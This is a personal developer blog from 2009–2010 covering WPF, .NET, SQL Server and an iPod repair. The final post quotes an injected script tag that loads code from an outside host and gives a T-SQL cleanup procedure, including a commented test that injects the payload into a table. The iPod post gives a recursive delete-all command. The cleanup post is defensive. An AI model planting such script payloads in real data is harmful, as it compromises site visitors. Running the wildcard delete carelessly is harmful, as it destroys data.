Friday, 1 October 2010

A better web image format

WebP+
I am exited to read about Google's efforts on the WebP format.
If we are going to work on a new image format, why not make one that loads progressively? Think back to the interlacing options of GIF, but go further than that. Much further.
If the image information was ordered in the file in such a way that a very basic fuzzy image (with limited colour space) could be displayed very quickly, then the image got better over time as more data was downloaded, this would assist everyone, not just mobile devices!
I'm not suggesting we repeat the "thumbnail" image efforts of other formats, where essentially the file contains two images, a tiny one, followed by a larger one. No, I mean a truly progressive file format where the longer you stay connected, the more detailed the image became in both resolution and colour accuracy. A smart device could sever the connection as soon as it determines that any further information would be superfluous on its display. For example, lets say you create a very detailed background image in 1920x1200 format for use on iMacs, and you have specified in CSS that this image must scale to fit the entire HTML window, and a visitor on an iPhone comes along... As soon as that device has downloaded enough information to render this background image in 480x320, it could sever the link to the server and save oodles of bandwidth!
Conceptually it might work like this. (I read this somewhere a long time ago, so if it is already patented by some greedy corporation, then I'm sorry but we will have to come up with something better).
First send a very small header which tells the renderer the total pixel dimensions of the file, and the total number of channels. If this is extensible so that arbitrary meta data can also be encoded, then so much the better, but encoders must give the user (content provider) the choice as to where in the file this meta data is, defaulting to the end so that mobile devices won't have to download them first. I also advocate including a fingerprint (MD5 hash of the entire file) in the header so that a device can determine if it has the full content or only partial content in cache. A simple file size or checksum is not enough, since we also want to ensure the file's integrity, including the metadata at the end. This has more to do with rights management... but I digress.
After the header we need to send the "average" colour for the entire image. For greyscale images this needs to be no more than 8 bits, and for colour images no more than 24 bits. If there is another channel (such as alpha) this needs to add no more than another 8 bits to store the "average" value for that channel.
Next we divide the image into four quarters and work out the average colour (and other channel) values for each quarter. We now need to send the difference between each quarter's average value and the whole image's average values. Typically these differences will be small and we can use some compression technique (perhaps Huffman, or LZW) to reduce the number of bits needed to encode these differences.
Next we divide each of the areas from the previous step into four quarters and work out the differences in average values for each quarter to the average value of the area in which they form part. Encode these differences to reduce the number of bits sent.
We keep on repeating this process until we are sending only the differences between individual pixels' values and the average of the four pixels in the local 4x4 cell which was sent in the previous step.
The trick to making this work well is going to be in choosing the right compression algorithm. We may even need a different algorithm in the early part of the file, and another one in the later parts as the pattern of differences change. Or perhaps a different algorithm for different channels (but this could be difficult to mix into one bitstream).
Some additional channels (such as refraction, reflections and bump maps) should perhaps not be mixed into the stream of colour and alpha. So the header format must be flexible enough to allow the encoder to specify which channels are mixed into which streams. This will allow simple/mobile devices to receive the information that they can work with quickly, and defer the optional extra information for more capable devices to follow later in the stream.
Comments and suggestions for bit encoding are welcome!

Wednesday, 14 July 2010

Microsoft .NET events and garbage collection

Scenario
We have created a fancy WPF (using XAML) desktop application which uses N-tier design philosophy (data tier, business logic tier, presentation tier) with data binding between the user interface and the business logic, utilising value converters.
The user interface is quite complex with lots of triggers and templates that change depending on whether the element has focus, or the mouse is hovering over it, or the data type it is bound to (for date types we swap to a calendar control, for boolean types we swap to check box, etc).
This works nicely and it all sits within an MDI (multiple document interface) style application. Each document is bound to one instance of our main business logic class. Of course this object has several properties that are collections of other objects, and these collections are bound to content presenters (a XAML term for something that can repeatedly apply the same template to each element in an arbitrary collection).
The properties of the business logic objects that are bound were "dependency" properties (a Microsoft implementation of an Apple Objective-C concept of bindable values dating back to the early nineties). Under the hood, this means the business objects implement the INotifyPropertyChanged interface which in turn means that they have a public event called PropertyChanged that is raised whenever one of the bindable properties are changed. This event has an argument containing the name of the property (i.e. a string!!! value) that has changed.
The user interface then subscribes to this event notification so that it knows when the displayed values need to be changed when the program logic updates these properties.
The problem
When the user closes one of these documents, you would expect to see a drop in the amount of allocated memory for the application. As it is, having one document open consumes about 200MB of memory, so when it is closed and we dispose of the business logic object instance, and remove the document from the visual tree, we expect the garbage collector to do its job and return that 200MB to the operating system. Can you guess why I'm blogging about this?
Not even a request to GC.Collect() has any effect.
It turns out (thanks Ants Profiler) that the data bindings are at fault. Specifically, the business layer objects are prevented from being disposed properly because the user interface bindings are still listening to the PropertyChanged events. The bindings themselves cannot be disposed because they are still referenced in the internal collection of PropertyChanged listeners (maintained in the business logic by auto-generated code). Catch 22.
The solution
Don't use Microsoft's dependency properties. I know it is so easy in Visual Studio to just type "propdp" then hit the Tab key and have an instant dependency property generated for you! Alas this is the last thing you should ever get in the habit of doing.
Instead, write your own light-weight bindable properties by implementing the INotifyPropertyChanged interface yourself. Declare your own PropertyChanged event. Manually handle the collection of event listeners in a List collection.
Implement the IDisposable interface (but you were doing this already, weren't you!) and in the Dispose() method, clear the list of event listeners. Problem solved; no more dangling references interfering with garbage collection!
It's a lot of work depending on the number of business layer classed that can be bound to the user interface, and in our case was over 100 classes and 3000 properties.
On the plus side, the performance of the application improves three-fold (lighter-weight binding takes far less time to set up) and the memory usage drops from 179MB to 9MB after a document is closed.

Comparing SQL Server DateTime columns with SmallDateTime columns

Scenario
You have a table in SQL Server where you want to record (a) when the row was originally created and (b) when it was last modified.
For (a) you aren't interested in millisecond accuracy, so you may choose to use the SmallDateTime data type. You use the getDate() function as the default value for this column to automatically insert the current date and time (to the minute accuracy) when a row is inserted.
For (b) you are interested in millisecond accuracy (for replication purposes perhaps) but definitely you are interested in the seconds so that you could match it up with, say, a web server log file to find out who did it, and where they were (i.e. page URL etc). You use the getDate() function as the default value for this column to automatically insert the current date and time (to the millisecond accuracy) when a row is inserted, and create a trigger to also set it on updates.
Now let's say you want to identify all the rows that have never changed since they were created.
Obvious solution
Select * from table where a = b
Wrong. Because of the difference in data types, (a) will almost never equal (b) even if no row has ever been altered! This query returns zero rows, when we know for a fact there must be at least one row that has never been altered.
Less obvious solution
Select * from table where year(a) = year(b) and month(a) = month(b) and day(a) = day(b)
This query finds one row (out of 9000 in the table) in around 9 seconds. Not great.
Better solution
Select * from table where dateDiff(day, a, b) < 1
This query finds one row (out of 9000 in the table) in around 0.4 seconds. Now put that in your pipe and smoke it!
For the record, I was testing on MS SQL Server 2005 Express (64 bit) running on Windows 2008 R2 x64 as a virtual guest of Windows 2008 R2 Hyper-V x64 on a physical Dell server with two Intel Xeon quad core CPUs running at 2.6 GHz with 16 GB RAM. No other guest machines were running at the time.

Friday, 18 June 2010

What is wrong with WPF?

In 2007 I attended a Microsoft sponsored event for the UK's Visual Basic User Group. Now, I am not a VB programmer and never have been, but this group is open minded enough to allow C# programmers like me in. Anyway, this event was VBUG UK's annual conference and was hosted at Microsoft's Reading campus. During the two day event, Microsoft provided many product evangelists to speak about the wonders of the Windows Presentation Framework (WPF) and Silverlight. Naturally I was impressed. The whole event was carefully designed to impress people like me. No more would I have to allow a quality program to go out to my customers with a 1990's user interface, for that is what Microsoft's Dot Net Windows Forms platform is in essence. I could now get a proper graphics artist in to craft a quality user interface directly in XAML and then get a C# programmer to hook that up to the business logic. My end users will finally get web-like polish, and here I mean gradient fills, rounded corners, subtly animated buttons and other controls... Really it was almost programmer's porn! Microsoft made a big thing about how they were sorry that they have neglected the graphics processor in the PC. Apparently the GPU manufacturers had been hard at work creating ever faster chips with 2D and 3D acceleration, spurred on by a growing home gaming market, but all these business desktop PCs had the same chips in them, that were sitting idle 99% of the time! Finally, Microsoft was going to let us developers write software in Dot Net that utilitised these fantastic GPUs. So I returned to the office full of inspiration and set about redesigning our company's bread-and-butter application to take advantage of all that WPF offered. Along the way, I built many small applications to try out this or that feature, like data binding, animations, custom controls, data access via LINQ (another new Microsoft technology that came along at the same time as WPF). It all worked beautifully, and fast, and used little memory... All the right things a software architect wants to know. I even wrote a few small applications to stress-test the system, and it worked reasonably well. Not as good as Windows Forms did, but then WPF did a hell of a lot more under the hood to make the user-experience much richer. So it was a trade-off I was willing to accept. So we hired two more C# programmers on the spot. Wind the clock forward two and a bit years, and my product is now ready to be unleashed on the world. Okay, maybe not the world, just those companies specialising in building Social Housing in the UK. A niche market really. A market that has evolved over the last three years. A market where these not-for-profit organisations have become more efficient at building more social houses for less grant money. A sector which has wholly embraced virtual server technology and thin client computing. Thin client devices with 128MB RAM running some Linux flavour that boots up in 5 seconds flat and loads Citrix WinFrame or something immediately. Devices that don't have graphics accelerators. Devices that are wholly inappropriate for WPF. So now I have a fantastic application, that cost an astronomical amount of money to develop, that none of my customers can use. Oh sure, it works on their Citrix servers, just very very slowly because neither the servers nor the clients have any graphics acceleration in hardware. Now that I have lifted my head out of the trenches (so to speak, for didn't you know that programming can be bloody harsh like a war almost) and looked around, I find everyone else has stopped developing for the desktop. All the major development is now in the browser. I hear buzz words like JavaScript (again, is this really making a comeback?), AJAX (not again, I thought this died a well-deserved death in 2005!!!), Python (what, from the 1980's?), Google AppEngine, Amazon S3, Amazon EC2 and Microsoft Azure, and so on... So instead of redesigning the wheel like Microsoft did with WPF, it seems everyone else decided just to improve the browser. While Microsoft spent 6 years doing nothing with Internet Explorer 7, the other browser vendors started to implement CSS3, and HTML5. When Microsoft finally woke up and decided that IE was dying, they rewrote large sections of rotten code and produced IE8, the most secure browser on the planet (for about two weeks until the hackers cracked the weak security), also the fastest Microsoft browser ever (still 25% slower on most tests than Google Chrome), and supporting five features from the HTML5 draft specification (okay, most other browsers support well over 90% of the HTML5 features). And I am wondering not so much what is wrong with WPF, but when has Microsoft lost the plot? Was it when Bill Gates semi-retired a few years ago? Was it when he completely retired? I'm shocked. I have always been a Microsoft fan boy, and wouldn't have anything to do with Apple or Unix. Novell, Sun, IBM and Apple have always been the big bad greedy bunch in my eyes. But in 2001 I got an iPod for a Christmas present. Right off the bat I had problems with it -- it was made by Apple after all, and required me to use iTunes on my PC instead of Windows Media Player (my favourite). The iPod itself was fine, it was iTunes that I hated. Not just me, apparently, too many other people complained about iTunes, and it has been improved tremendously over the years. It is now my favourite media player. Maybe because I now have an iPhone in my pocket, another iPod that permanently lives in my car, a little one I take into the gym with me... And I now have an iMac at home on which iTunes really shines. It turns out that the problems I had with iTunes was really just down to iTunes not finding support in the Windows operating system for things that were supported in the Mac OS. So Apple is still very greedy in my eyes, but I love the quality and intuitive usefulness of their products, which is a trade-off that I am willing to accept. My own company's email had been moved away from an in-house Microsoft Exchange server, into Google Mail (Premier Apps), and I must say, it has been a vast improvement. It turns out that Email is not really an application that should be hosted anywhere but in the cloud. Really, if you think you can host it on-site, think again. You are just wasting your time and money. Back to WPF. Surely if my customers have such light-weight client devices that can't run WPF, then they will also struggle with rich web 2.0 applications? Yes, at the moment they do. But, Citrix (and VMWare) are working on improving the remote desktop protocol to allow smoother animated web browsing in thin-client setups. They are not working on speeding up WPF though, as that is a proprietary Microsoft technology, and the problem is not that Citrix or VMWare don't want to improve this, it is just that Microsoft sees them as competitors to their own Windows 2008 Application Streaming product, and therefore won't cooperate. So how about Windows 2008 Application Streaming. How well does that do in thin-client setups? There's only one way to find out, I said. So we bought a new server and installed Win2008R2 in application hosting role. We bought a couple of Windows XP thin client PCs (a lot more expensive than the Citrix/Linux versions) and upgraded the Remote Desktop Clients to version 6 and did some WPF testing. Need I tell you the results? No, I'm not going to depress you any further. Even if I could persuade all my customers to upgrade their two-year-old thin client PCs to Windows versions, they will still not ask me to slow down my application's user interface. So what really is wrong with WPF then? 1) Memory. Microsoft designed this technology back in the day before they lost the plot, when a dream of Windows on every business desktop (not a thin-client desktop mind you) was a realistic vision. If every user had a PC with 2 or 3GB of RAM, then what's a few megabytes of overhead per form, and a few kilobytes of overhead per control, per style (skin), per template, per language, per colour, etc.? In reality these all add up quickly and once you have built a decent size business application, you need a couple of gigabytes to run just this one application. 2) Graphics. Microsoft designed WPF when each desktop PC had its own GPU under direct control of Windows DirectX. Sadly this is no longer the case. Microsoft weren't the only ones to realise these power-hungry GPUs were not utilised in business PCs! Others noticed it too and decided to remove them completely and scaled down the business PC to just a thin device that is not only green (using little power) but also quiet (requires no fans for cooling). Hey let's all do our bit to save the planet!
3) Speed. Whenever Microsoft launches anything new, it is always slow for a while until hardware vendors rise to the challenge. Within a few months better hardware will come along to make the new Microsoft product work just as fast as the previous Microsoft product (with fewer features). Microsoft designed WPF in an era when Intel and AMD still delivered annual speed increases in CPUs. Sadly they stopped doing that. Instead we now have CPUs with more cores and more powerful cores, that still run at just around 2GHz. The only way to make use of these extra cores is by writing multi-threaded applications. Sadly WPF is NOT MULTITHREADED. 4) Multi-threading. Like Windows Forms before it, WPF is not multi-threaded. You can start up as many background threads as you like to do anything you like, but only one thread (the one started by the operating system when it loaded your application) can touch the user interface. If any other thread tries to add, say, a node to a tree control, all hell breaks loose. This is the most serious flaw in Microsoft's whole Windows graphics subsystem. Of course there are ways around this. But this means using queues (more memory) and timers (artificial delays) and expensive cross-thread dispatching (wasteful in CPU cycles). Not to mention all the extra checks Microsoft have built in. Every time you try to change anything in the user interface, Microsoft first checks to see if you should be allowed to do so -- not a security feature -- just a thread-limiting measure to keep the operating system stable. I have to ask, like so many before me, why oh why can't they make the windowing system thread-safe? Do we have to wait for Windows 11? When that finally happens, will anyone still have an actual PC to install it on? I wonder. 5) Data binding syntax. This is one of the most powerful features of WPF, bat also the most poorly designer, and poorly documented. It's a bit of a black art really, and many good developers make too many mistakes. Expensive mistakes, you know the kind that takes weeks to debug and pin down? Yeah them. 6) LINQ. This is a technology that makes it easy to write data queries in your favourite langue -- C#. No more SQL syntax to mix in with C#, just plain readable goodness. Bah, it only it performed at 10% the speed of a DataReader one could still perhaps motivate its use as a good tradeoff between program maintainability and end-user performance. Sadly, its much worse of a tradeoff. LINQ creates and object instance for each row of data it retrieves, plus collections of these, and uses DataChange events to track changes to these instances. Great, except if you repeat the query, you get a whole new set of objects, and now you have two object instances referring to the same row of data, and they are not kept in-sync! So you end up maintaining your own Dictionary collections of the same instances, which uses even more memory and wastes even more time... Even then, if another user modifies a record on the database server that you already have an object instance in memory for, you don't know it, because LINQ does not implement SQL Server 2005's notification services. Believe me, unless you are writing trivially simple applications where you don't care about other people writing to the same records that you are observing on your screen, you are far better off as a developer to stick to DataReaders and hand-crafted SQL queries. And finally, please don't tell me I have sour grapes. I know that already thank you.

Sunday, 6 December 2009

How I fixed my daughter's iPod (5th generation)

Picture this. I traded my three year old Windows PC in for a shiny new iMac. After transferring the family's entire 300 GB music library from the old PC to the new Mac, it was time to synchronise all four of the iPods of the family, and two iPhones with the new iTunes library. All went well until my daughter plugged in her 5th generation iPod. If this kind of thing interests you, the engraving on the back identifies the model as A1236 but the software on the fron identifies it as MA978. Here's what happend. Plugging it into the iMac caused the usual icon to appear on the desktop labelled Marie's iPod. iTunes was already launched, but even after a few moments more than what I would usually consider reasonable, it still didn't show up under the DEVICES node in the tree. So I quit iTunes and re-launched it. Same result. So I restarted the Mac OS X, with the same result. So I then reset the iPod (holding down MENU and SELECT buttons for more than six seconds until the Apple logo appeared) and hurrah! it showed up in iTunes. But, alas, that was only the first hurdle. After selecting the right playlist and verifying the iPod already had the latest version of its firmware (it had) it was time to click the Sync button. And nothing happened other than the message "Syncing iPod..." appearing in iTunes and the actual iPod reverting to displaying its main menu as if someone had "ejected" it. After a long while an annoying message popped up over iTunes informing me that it was "Looking for iPod...". You know the type of old-school error message dialog box that you can't dismiss or even move out of the way. While this box is being displayed, you can't even do anything else with iTunes. All you can do is wait for the timeout which is only 120 seconds but feels like hours! Anyways, I won't bore you with all the things I tried (things that are suggested by Apple's support no less) but failed, so here's the solution. Find a Windows machine. I know what I am trying to tell you here is probably very easy to do with a Mac and a terminal window, but life's too short to find out how (I did Google it for an hour and gave up). Find a Windows machine and plug in the iPod. Wait for the AutoPlay pop-up that asks you if you want to view the files on drive X (where X is somewhere between D and Z). Make a note of the drive letter and close the pop-up. Open a DOS box or command prompt window. Type in X: (where X is your iPod drive letter noted earlier) and press enter. Now type in ATTRIB -H .* and enter. This will unhide all the sensitive iPod folders on the drive. Now type in exactly this FOR /D %A IN (*.*) DO RD "%A" /S/Q and enter. This will remove all the folders and their contents, and may take a while. This is what the Restore button in iTunes is supposed to do, but doesn't. Click on the tray icon for USB and choose to safely remove the hardware (iPod). Unplug from the Windows machine and re-plug into the iMac and all should be well from here on. It was for me. iTunes detected the new device and asked me to name it, then asked me what music I wanted to put on it, and it worked. The irony of the matter is that I no longer had a Windows machine to do this on, so I had to do it from a Windows XP installation on a virtual machine (using Parallels) on the iMac itself!

Saturday, 28 November 2009

Project for 28 Nov 2009

Write an IrfanView clone for Mac OS X. Hmm should I use Cocoa in XCode for this?

Thursday, 22 October 2009

How to remove SQL Server code injections in a hurry?

So you suddenly find that your web server has been compromised. How? Who knows. In my case we had an ASP.NET website which used the default settings for ViewState (i.e. sent to the client as a hidden form field, expecting the client to return it unaltered when the form is submitted). Of course, the default settings (recommended by Microsoft) leaves IIS wide open to an exploit called SQL Injection. Some crafty buggers discovered how to do this and they've been crawling the web looking for ASPX pages and throwing all sorts of nasty stuff into the ViewState fields until they hit pay-dirt...

So, what's the harm? This virus discovers the names of all the text columns in all your tables in all your database(s) to which the website has access, then it appends a string like <script src="http://www.doubleclickr.ru/index.js"></script> to all values in that column. Your website may well return some of these text fields back to the client as HTML to be displayed, and that's when the problem starts for the client. The client's browser interprets this HTML coming from your site as a legitimate request to fetch a mash-up script from DoubleClick (or whatever), and that script then tries to turn the client's PC into a zombie that obeys the bidding of the Russian Mafia (or whoever controls the virus). Will the client blame you? For sure they will, because you are supposed to ensure your server is virus-free, right! Well, with this kind of attack, your server is not itself running any virus code, and therefore no anti-virus program running on your server will pick up this 'infection' in the data. Tricky one.

So here is a little SQL script to create a procedure that will remove such a string from every text field in every table of the current database. This script employs much the same tricks to discover all the text fields, as I'm sure the virus must be employing..
   1:  Alter procedure RemoveSqlInjections
   2:  (
   3:      @remove nVarChar(4000) = '<script src=http://www.doubleclickr.ru/index.js></script>'
   4:  )
   5:  as
   6:   
   7:  /*
   8:   
   9:  Inject one test...
  10:  -------------------
  11:   
  12:  Update    users 
  13:  set        messageText = messageText + @remove 
  14:  where    userid = 
  15:  (
  16:      Select top 1    userId 
  17:      from            users 
  18:      where            messageText is not null
  19:  )
  20:   
  21:  -------------------
  22:  */
  23:   
  24:  Declare @sql nVarChar(max), 
  25:          @table nVarChar(64), 
  26:          @column nVarChar(64), 
  27:          @value nVarChar(128),
  28:          @count int
  29:   
  30:  Set noCount on
  31:   
  32:  Declare injectionRemover cursor for
  33:  Select    [table], 
  34:          [column], 
  35:          case when [convert] is not null
  36:              then 'convert(' + [convert] + ', ' + [column] + ')'
  37:              else [column]
  38:          end as [value]
  39:  from
  40:  (
  41:      Select         '[' + a.name + ']' as 'table', 
  42:                  '[' + b.name + ']' as 'column', 
  43:                  case 
  44:                      when b.xType in (98,99) then 'nVarChar(4000)'
  45:                      when b.xType = 35 then 'varChar(8000)'
  46:                  end as 'convert'
  47:      from        sysobjects a
  48:      inner join    syscolumns b
  49:          on        a.id = b.id
  50:      where        a.xtype='U' 
  51:          and        b.xtype in (1,6,7,35,98,99,167,175,231,239)
  52:  ) c
  53:  order by 1
  54:   
  55:  Open injectionRemover
  56:   
  57:  While 1=1 begin
  58:      Fetch next from injectionRemover into @table, @column, @value
  59:      If @@fetch_status <> 0 break
  60:   
  61:      Set @sql =    'Update ' + @table + 
  62:                  ' set ' +  @column + 
  63:                  ' = replace(' + @value + ', ''' + @remove + ''', '''') where ' +
  64:                  @value + ' like ''%<script%'''
  65:   
  66:      Exec(@sql)
  67:      Set @count = @@rowCount
  68:      If @count > 0 begin
  69:          Set @sql = 'Replaced ' + convert(nVarChar(10), @count) + ' occurence(s) in ' + @table + '.' + @column
  70:          Print @sql
  71:      end
  72:  end
  73:   
  74:  Close injectionRemover
  75:  Deallocate injectionRemover
After creating the procedure just run it. With no parameters it will remove the the same nasty that infected my server, but you can supply a single parameter like so:
Exec RemoveSqlInjections '<script src="some other nasty thing"></script>'
It is not case sensitive (by default, but if your server's collation is binary or some other case-sensitive variant, then watch out for case variations).